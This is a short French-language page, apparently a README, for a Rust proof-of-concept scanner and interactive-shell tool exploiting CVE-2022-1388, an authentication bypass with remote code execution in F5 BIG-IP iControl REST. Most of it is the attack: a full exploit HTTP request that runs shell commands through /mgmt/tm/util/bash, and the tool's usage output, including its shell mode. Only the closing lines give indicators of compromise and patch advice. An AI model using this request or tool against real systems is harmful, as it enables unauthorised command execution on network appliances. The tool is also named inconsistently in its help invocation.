
CVE-2022-1388 F5 BIG-IP iControl REST Contournement d'authentification RCE écrit en Rust
Scanner et shell interactif pour CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE écrit en Rust
Pour résumer, voici un aperçu des conditions nécessaires d'une requête pour exploiter cette vulnérabilité :
POST /mgmt/tm/util/bash HTTP/1.1
Host: 127.0.0.1
Authorization: Basic YWRtaW46aG9yaXpvbjM=
X-F5-Auth-Token: thisisrandomstring
User-Agent: curl/7.82.0
Connection: X-F5-Auth-Token
Accept: */*
Content-Length: 39
{
"command":"run",
"utilCmdArgs":"-c id"
}
$ cve_2022_1308_rs -h
CVE-2022-1388 PoC 1.0
Petruknisme <[email protected]>
Scanner et shell interactif pour CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE écrit en
Rust
USAGE:
cve_2022_1388_rs [OPTIONS] --url <URL>
OPTIONS:
-h, --help Print help information
-s, --shell This mode for accessing payload with interactive shell
-u, --url <URL> F5 Big-IP target url
-V, --version Print version information
Les IoCs peuvent être trouvés dans le fichier journal /var/log/audit. Les commandes non reconnues exécutées par le point de terminaison mgmt/tm/util/bash doivent être source de préoccupation.
Mettez à jour vers la dernière version ou atténuez en suivant les instructions du bulletin de sécurité F5